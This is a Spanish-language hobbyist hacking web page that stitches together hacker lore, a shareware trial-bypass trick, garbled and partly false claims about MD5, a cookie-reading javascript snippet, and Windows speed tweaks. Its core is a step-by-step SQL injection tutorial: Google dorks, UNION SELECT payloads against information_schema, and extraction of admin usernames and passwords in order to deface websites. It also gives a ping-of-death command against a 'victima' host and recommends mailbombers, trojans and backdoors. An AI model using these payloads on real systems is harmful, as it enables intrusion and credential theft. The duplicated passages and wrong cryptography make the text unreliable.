Menu Defcon |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Entonces que es un Hacker?.
Si hacemos esta pregunta a alguien de la calle, probablemente conteste con un insulto. En nuestro país
este fenómeno no es bien conocido muy bien todavía.Los verdaderos Hackers nunca comentan nada de sus trabajos y si lo hacen, suelen utilizar
apodos para no ser descubiertos. Si es un principiante, solo deseara recopilar información y lo copiara.
Estos individuos se llaman LAMER y son rápidamente expulsados de los heroicos guerreros de la red.
Existen al menos cinco tipos de Virus conocidos hasta ahora, esto no quiere decir que están todos,
seguramente mientras escribo estas líneas habrá surgido algún que otro engendro mas sofisticado. Pero
básicamente son estos :
* Virus de arranque o Virus de Boot.
* Virus de Macro.
* Virus de ficheros.
* Virus polimorficos.
* Virus multiparte.
El perfil del Hacker
Un perfil idóneo prácticamente no existe, pero si un acercamiento. El Hacker es alguien compulsivo y
obsesivo por acumular conocimientos. Es extrovertido e investiga todo lo relacionado con la electrónica y
la informática. Es el tipo de personas que suelen abrir todos los aparatos de consumo de casa o lee los
ficheros de su ordenador hasta modificarlos para ver que sucede.
Un buen Hacker se apunta lo aprendido y no lo difunde
con una sonrisa de oreja a oreja, como un idiota. Se calla. Es mejor para poder proseguir.
Si es cierto que al Hacker, le entusiasma todo lo que rodea la tecnología, la telefonía celular, los ordenadores,
las tarjetas de credito electrónicas o los Satélites. Normalmente lee demasiadas revistas y estudia
pesados libros de técnica
Los gurus
Son los maestros y enseñan a los futuros Hackers. Normalmente se trata se personas adultas, me refiero
adultas , porque la mayoría de Hackers son personas jóvenes, que tienen amplia experiencia sobre los
sistemas informáticos o electrónicos y están de alguna forma hay, para enseñar a o sacar de cualquier duda
al joven iniciatico al tema.
Es como una especie de profesor que tiene a sus espaldas unas cuantas medallitas que lo identifican
como el mejor de su serie. El guru no esta activo, pero absorve conocimientos ya que sigue practicando,
pero para conocimientos propios y solo enseña las técnicas mas basicas.
SON SEGURAS LAS PAGINAS WEB SOBRE HACKING
Algunas de ellas pueden resultar peligrosas e inseguras, pero no todas. Es cierto que las paginas sobre
Hacking, pueden resultar una muy buena fuente de información para los « novatos «, pero existen algunas
paginas, creadas por personas con vagas intenciones, que colocan en ellas utilidades dañinas como Virus
o cookies
ES SEGURO EL CORREO ELECTRÓNICO
En absoluto, el correo electrónico no es nada seguro. A través de el se pueden recibir ficheros « pegados
« indeseables. Además el correo electrónico puede ser interceptado y leído por los Lamers, que emplean
Sniffers, programas capaces de interceptar correo electrónico entre otros.
QUE HERRAMIENTAS SON IMPRESCINDIBLES PARA EL « HACKER «
El Hacker necesita herramientas que le faciliten el trabajo en la red. Entre estas herramientas destacan
los sniffers, escaneadores y programadores de tarjetas inteligentes. También se recomienda poseer algún
Mailbombing y Nukenabber para enfrentarse a aquellos que solo actúan por fastidiar.
tambien un buen virus bajo la manga
La ingeniería social es quizás la base de un Hacker, para obtener los datos o lo que le interesa por medio
de una conversación y de personas
El truco de Simply es hasta la fecha el mas sencillo y el mas elegante hasta la fecha. Este truco se puede
hacer de forma manual o automática, esto es, a través de Software o Hardware.
Hasta la fecha en que se están escribiendo estas líneas, este truco ha conseguido burlar perfectamente
cualquier tipo de contador DSS o similar, ya que se trata de “ congelar “ el tiempo del reloj fuera de los
ficheros INI y no registrarlos.
Dicho de otra manera, antes de arrancar el sistema operativo hay que introducirse en la BIOS y modificar
la fecha, guardando siempre relación. Esto quiere decir que si se bloquea el día 5, el ordenador
siempre deberá registrar que esta en el día 5. Como se sabe, los contadores pueden detectar cambios
inferiores de fecha, pero no igualdades, y como hasta la fecha no se controla la hora y los minutos, el truco
esta servido.
Con este método han caído todos los últimos programas del mercado hasta la fecha, palabra.
Nota : No se pretende promocionar el truco Simply ni ninguno de los expuestos en este capitulo,
de modo que quien lo ejecute quedara a responsabilidad suya el “ trequear “ el Shareware y
de nada responde el autor o autores de esta obra, el empleo de este truco u otros descritos. Al
no existir copia ni animo de lucro, no existe piratería. Queda dicho.
ahora mostraremos algunas formas de encriptacion bastante utiles
* MD5.....este algoritmo esta desarrollado por el grupo RSA y es un intento de probar con otros sistemas
criptográficos que no empleen claves. El algoritmo desarrollado es capaz de obtener 128 bits a partir
de un determinado texto. Como es lógico hasta el momento no se sabe cuales son las operaciones matemáticas
a seguir, pero hay alguien que dice que es mas que probable que se basen en factores de números
primos.
postada no les digan a nadie pero son secuencias en primos en factor euler
ahora esto les gustara
Espiaremos una comunicación
primero sin usar ningún tipo de protección y después con un cliente SSH.
Primero dejamos nuestro sniffer escuchando todos los paquetes TCP nuestra
propia red. Y nos loggearemos a una cuenta de Messenger usando un servicio
en línea como ebbudy o la que gusten y analizaremos el trafico.
Terminando de loggearnos checamos el Logg file que se crea al marcar la
casilla de “Enable Loggining”, y busquemos entre sus entrañas.
Después de buscar un rato en los paquetes TCP, nos encontramos con una linda
cookie que crea ebuddy al loggearnos.
Como verán esta mi mail tan claro como el agua (el cual es falso jiji) y un lindo
hash con la contraseña, que por lo menos ahora viajan en hash, en el primer
Messenger que saco Yahoo no hacia ni eso…
Esto no aclara el hecho que es importante que nadie pueda husmear en la
campo data de nuestros paquetes, digo es como si mandaras cartas y cualquier
cartero pervertido pudiera ver lo que dice sin ningún inconveniente.
Ahora hagamos lo mismo pero usaremos el putty para conectarnos a un
servidor SMTP usando el Secure Shell
Observando uno de los paquetes nos damos cuenta que el campo data no es
comprensible ya que esta encriptado, lo cual pone mas difícil las cosas,
dependiendo del cliente/servidor la comunicación estará encriptada en RSA de
64,128, 256 o hasta 1024bits
XSS
es un ataque basado en la explotacion de vulnerabilidades del sistema de
validacion de HTML incrustado
Sucede cuando hay un mensaje o una ruta en la URL del navegador o en una
cookie. Para saber el contenido de una cookie, sin usar ningun tipo de iecv o
addin para tu navegador, puedes usar el siguiente script de jasildbg. Solo
coloca TODO lo que esta en color negro en la barra de direcciones, y presiona
Enter.
Una vez dentro se puede modificar la cookie a tu antojo. Si pones cancelar la
cookie se borrara.
el uso de la libreria cURL un usuario malintencionado, podria al
recibir tu cookie, entrar a la pagina, y dejarla en cache, para que el atacante
cuando quiera, pueda entrar como tu, sin siquiera necesitar tu contraseña.
Este codigo (muy peligroso) borra todo el contenido de la pagina en cuestion, y
escribe otra cosa:
javascript:for(var g in document.cookie.split
(';'))void(prompt("Valor de cookie "+document.cookie.split
(';')[g].split
(’=')[0],document.cookie.split(’;')[g].split(’=')[1]));alert
(”Cookies:n”+document.cookie.replace(/;/,”rn”));
Una vez dentro se puede modificar la cookie a tu antojo. Si pones cancelar la
cookie se borrara.
el uso de la libreria cURL un usuario malintencionado, podria al
recibir tu cookie, entrar a la pagina, y dejarla en cache, para que el atacante
cuando quiera, pueda entrar como tu, sin siquiera necesitar tu contraseña.
Este codigo (muy peligroso) borra todo el contenido de la pagina en cuestion, y
escribe otra cosa:
¿Qué es Deface?
El Deface / Defacing / Defacement es la modificación de una página web sin
autorización del dueño de la misma.
Primero hay que tener un buen dorks SQL, por ejemplo.
“allinurl: .php?id= “
Sin las comillas. Ese Dork es el más básico pero hay muchísimos más, todo es
con tal de ir mirando.
Bueno ya hemos encontrado una, www.web.com/noticia.php?id=34
Ahora para saber si es vulnerable, le tenemos que quitar el 34, y ponerle ‘.
Quedaría a si:
www.web.com/noticias.php?id=’
Si nos sale un error mysql , tipo este ;
Warning: mysql_error(): supplied argument is not a valid MySQL-Link resource
in /usr/home/xxxX/public_html/_sys/general_functions.php on line 5
Lo principal es;
-1+union+all+select+0,1
Quedaría así ;
www.web.com/noticias.php?id=-1+union+all+select+0,1
Ara toca ir buscando, hasta que se te quite los errores, y te salgan números.
Para ir buscando tienes que ir añadiendo números , ejemplo:
www.web.com/noticias.php?id=-1+union+all+select+0,1,2,3,4,5,6,7--
Siempre al final de cada numero pon “--“ [Dos guiones] sin las comillas.
No siempre acaba en 7, puede acabar en 100, 200, quien sabe.
A mí, me ha salido los números en 7, y me ha tirado el 4, 6 y 7.
Ahora toca coger uno de ellos, el que sea, yo cojo el 4.
Ara tenemos que hacer lo siguiente:
Si as elegido el 4, borras el numero 4 y pones “table_name” sin las comillas y al
final pones;
+from+information_schema.tables—
Y nos quedaría a si:
www.web.com/noticias.php?id=-
1+union+all+select+0,1,2,3,table_name,5,6,7+from+information_schema.tables
—
Ahora se nos ha cambiado el 4 por CHARACTER_SETS. Que es lo que normal
mente sale al principio. Ara nos toca buscar tablas como “admin, root, login,
miembro, member, user, usuario, administrador, etc. “Y aviso, no es lo mismo
admin que Admin. Me explico, a lo mejor con admin no te sale y con Admin sí.
Para buscar las tablas tienes que borrar los dos guiones finales y poner ;
+1,1--
Y ir cambiando el primer 1 por los siguientes números, ejemplo:
www.web.com/noticias.php?id=-
1+union+all+select+0,1,2,3,table_name,5,6,7+from+information_schema.tables+
1,1--
www.web.com/noticias.php?id=-
1+union+all+select+0,1,2,3,table_name,5,6,7+from+information_schema.tables+
2,1--
www.web.com/noticias.php?id=-
1+union+all+select+0,1,2,3,table_name,5,6,7+from+information_schema.tables+
3,1--
A si hasta que te salga algo importante. Nunca suele pasar de 100 pero bueno,
nunca se sabe.
A mí me ha tirado la tabla admin en 17. Ahora vamos hacer lo siguiente:
Borras +information_schema.tables+3,1-- , quedara a si:
www.web.com/noticias.php?id=-
1+union+all+select+0,1,2,3,table_name,5,6,7+from
y pones +admin , pones admin por que es la tabla importante que te ha tirado,
quedaría así:
www.web.com/noticias.php?id=-
1+union+all+select+0,1,2,3,table_name,5,6,7+from+admin
& ara en table_name hay que ir probando palabras como; “Login, admin,
password, clave, pass, user, email, mail , etc... “ Quedaría a si:
www.web.com/noticias.php?id=-
1+union+all+select+0,1,2,3,admin,5,6,7+from+admin
A mí el user me lo ha tirado en “admin” y la contraseña en “clave”. Ahora borras
lo que has puesto en 4, y pones :
concat(nombre,0x3a3a,pass)
Quedaría a si:
www.web.com/noticias.php?id=-1+union+all+select+0,1,2,3,
concat(admin,0x3a3a,clave),5,6,7+from+admin
Os explico, admin es la tabla donde nos ha dado el usuario, 0x3a3a es :: en
hexadecimal y clave es la tabla donde nos a tirado el password.
Y Listo ya tenemos usuario y password. Ahora toca buscar el panel
Ping De La Muerte.
Esta tecnica no es propia de un Hacker ya que unicamente sirve para tirar un
servidor o sea que se desconecta de Internet y esto puede representar
grandes perdidas a una empresa. Con esto solo os quiero decir que aunque
aqui os lo explicare no es cuestion que lo useis por Internet atacando
servidores.
ping muy grande y producira su caida. Para ejecutar este ataque solo
tenemos que escribir :
c:>ping -l 65510 victima.com
Whois.
La utilidad Whois, al igual que Finger es muy comun en Unix y no esta
disponible en Win95/98 pero comos somos asi de listos saldremos del apuro.
Tambien sirve para pedir informacion de un servidor pero no el igual que
Finger, ya que se diferencian en el tipo de informacion, el finger se suele
utilizar mucho para buscar direcciones de correo mientras que el Whois,
para averiguar informacion sobre un servidor en concreto.
Para usar esta utilidad, ejecutamos el Telnet y nos dirigimos a un
host muy especial:
c:>telnet whois.internic.net
Por supuesto Internic, una empresa privada norte ameriacana que se
encarga de controlar los dominios de Internet, y podemos usar su base
de datos para pedir informacion sobre un servidor.
Cuando conectemos a la base de datos de Internic, escribimos "Whois nombre_
del_servidor" y nos sacara la informacion.
Winipcfg.
Ejecutando este comando, nos saldra una ventana windows informandonos de
los diferentes valores de nuestra red. Realmente util para verificar la
configuracion.
Encriptando Nuestro Correo.
Conviene encriptar nuestro correo, sobre todo si esta relacionado con el
hacking, ya que asi nadie podra saber que pone y acusarnos de nada. Siempre
podemos alegar "Privacidad en los Datos" . Al igual que antes hay varios
paquetes de PGP para mail.
Sugerencias Para Un Mejor Hacking.
Aqui hablare sobre algunas ideas que pueden potenciar el hacking en
Win95/98 y la creacion de nuevas herramientas.
- Programas troyanos que capturen el password del acceso a Internet.
- Programas para IP-Spoof.
- Creacion de herramientas de redes para Win95/98.
- Wardialers.
- Programas para atacar otros Win95/98 (DoS).
- Nuevas Suites.
- Programas crackeadores del passwd.
- Programas criptograficos.
- Programas eliminadores de ficheros de forma segura.
- Puertas traseras.
Liberar memoria RAM
Liberar memoria RAM. Tras haber ejecutado una o múltiples aplicaciones o juegos que hagan uso intensivo de los recursos del sistema, habremos detectado que Windows queda algo "tocado", mucho mas lento. Esto es debido a que los restos de las aplicaciones bloquean parte de la RAM que han utilizado, ocasionando lo que se llama "fragmentación de memoria". Mediante un pequeño script podemos liberar esa memoria , forzando al ordenador a descargar el contenido de la memoria al archivo de intercambio de forma que recargue de nuevo toda la información activa en la memoria y deseche la información no útil, esto lo haremos de la siguiente forma:
Abrimos el bloc de notas de Windows y dependiendo de la memoria de nuestro ordenador escribiremos los siguientes valores:
Si tienes menos de 128 Mb de memoria RAM, escribes Mystring=(16000000)
Si tienes 128 Mb de memoria RAM o más escribes Mystring=(80000000)
Ahora guarda este archivo en el lugar que quieras, con el nombre "liberar.vbe" (no te olvides poner la extensión .vbe ya que el nombre no importa puedes poner el que quieras).
Ahora hacemos doble clic sobre el archivo que acabamos de crear y windows refrescará la memoria RAM.
Mayor velocidad de acceso a los programas
Aunque tu equipo disponga de suficiente memoria RAM y puedas trabajar con varios programas sin problemas el sistema siempre utiliza el Kernel para enviar y recibir archivos del archivo de paginación del disco duro, por este motivo la velocidad del ordenador se frena, si ya dispones de memoria RAM suficiente sigue estos pasos:
Haz clic sobre el botón Inicio y a continuación sobre Ejecutar, escribe regedit y pulsa el botón Aceptar
Ahora te desplazas por la siguiente cadena:
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Session Manager/Memory Management
Busca en el panel derecho la entrada DisablePagingExecutive y haz doble clic sobre ella.
En la ventana que aparece cambia el valor de 0 y pones 1 luego pulsa el botón Aceptar y reinicia tu ordenador, ahora conseguirás mas velocidad de acceso a los programas porque utilizará menos el disco duro.
Arrancar y Apagar mas rápido el PC
Conseguirás rapidez en el arranque y apagado de tu ordenador, siguiendo los pasos que a continuación te proponemos:
Haz doble clic sobre "Mi PC"
Entra en la unidad C
Selecciona el menú "Ver/Opciones"
Selecciona la pestaña "Ver"
Selecciona todos los "Archivos/Aplicar"
Haz un clic sobre el botón derecho sobre el archivo MSDOS.SYS
Después, ves a "Propiedades" y elimina la marca de "sólo lectura y oculto/Aplicar"
Selecciona el archivo y ábrelo con el bloc de notas
Sobre "Opciones" ya sólo tendrás que escribir BootDelay=0
Finalmente, ponle los atributos de "sólo lectura y oculto".
Eliminar archivos que no se dejan borrar
Con frecuencia nos encontramos que al intentar borrar un archivo, XP nos contesta que no se puede eliminar porque el archivo está siendo usado por otro programa, este problema suele ocurrir cuando intentamos borrar archivos en formato *.avi. Normalmente el problema suele estar producido porque algún avi está dañado y el codec correspondiente (el cual se invoca siempre en vista previa) se cuelga y no lo suelta.
Recordad que AVI no es un tipo de fichero, sino que es un "contenedor" de formato de video, y que en la cabecera interna, lleva realmente grabado el tipo de video que es y por tanto el sistema sabe a que codec debe llamar.
Para solucionar este problema abriremos una ventana de comandos
Hacemos clic en el botón inicio y luego sobre Ejecutar
A continuación escribimos cmd y pulsamos el botón Aceptar
Cerramos todos los programas que tengamos abiertos menos la pantalla de MS-DOS que acabamos de abrir.
Volvemos ha hacer clic en el botón Inicio y luego sobre Ejecutar
Escribimos Taskmgr.exe y pulsamos el botón Aceptar
Volvemos a pulsar el botón Inicio y luego sobre Ejecutar
Escribimos explorer.exe y pulsamos el botón Aceptar.
Volvemos a la ventana de comandos e iremos a la carpeta donde tengamos el archivo que queremos eliminar y escribiremos: del dejamos un espacio y escribimos el nombre_archivo
Volvemos de nuevo al administrador de tareas, Archivo > Nueva tarea y escribimos "explorer.exe" (sin comillas) para reestablecer el escritorio. Ya podemos cerrar el administrador de tareas y la ventana de comandos.
Atajos del teclado en Windows Vista
Alt + Tab = Combinación para cambiar entre las distintas ventanas que tengamos abiertas.
Ctrl + Alt + Tab = Hace lo mismo que Alt + Tab pero si soltamos las teclas no se cerrara la ventana.
Ctrl + Alt + Supr = Abre una ventana desde la que podemos, bloquear el equipo, cambiar de usuario, cerrar sesión, cambiar una contraseña e iniciar el administrador de tareas.
Ctrl + Mayúsculas + Esc = Abre el administrador de tareas de Windows.
Ctrl + Mayúsculas + Enter = Abre un programa como administrador.
Win = Abre el menú de inicio.
Win + F1 = Abre la ayuda de Windows.
Win + 1 = Lanza la primera aplicación de la barra de inicio rápido, cambiando el numero 1 por el numero 2 abrirá la segunda aplicación de la barra de inicio rápido y así sucesivamente con todas las aplicaciones que tengamos en el menú.
Win + Tab = Activa el Flip 3D con el que movernos entre las ventanas viendo una vista previa. Cada pulsación sobre Tab que hagamos (manteniendo Win pulsada) cambiará a la siguiente ventana y al soltar, la ventana seleccionada se mostrará en el frente.
Ctrl + Win + Tab = Mantiene el Flip 3D después de liberar las teclas y podemos movernos entre las ventanas con las teclas de cursor.
Win + Espacio = Trae al frente la barra lateral.
Win + Pausa = Abre la sección de Sistema del panel de control.
Win + D = Muestra el escritorio, si volvemos a usarlo vuelve a su estado anterior.
Win + E = Abre el explorador de Windows.
Win + F = Abre el diálogo de búsqueda.
Win + G = Permite cambiar el foco entre los gadgets de la barra lateral.
Win + L = Bloquea el equipo.
Win + M = Minimizar todas las ventanas.
Mayúsculas + Win + M = Permite restaurar todas las ventanas.
Win + R = Abre el diálogo Ejecutar.
Win + T = Pone el foco en la barra de tareas, con la versión minimizada de la ventana activa seleccionada, mostrando la vista previa de la ventana. Podemos movernos entre las distintas ventanas pulsando de nuevo Win + T, o pulsando T sin soltar Win, o con las teclas de cursor.
Win + U = Centro de accesibilidad.
Win + X = Centro de movilidad de Windows.
|
|
|
|
|
|
|
8 visitantesEn linea en este momento |
|
|
|
|
|
|
|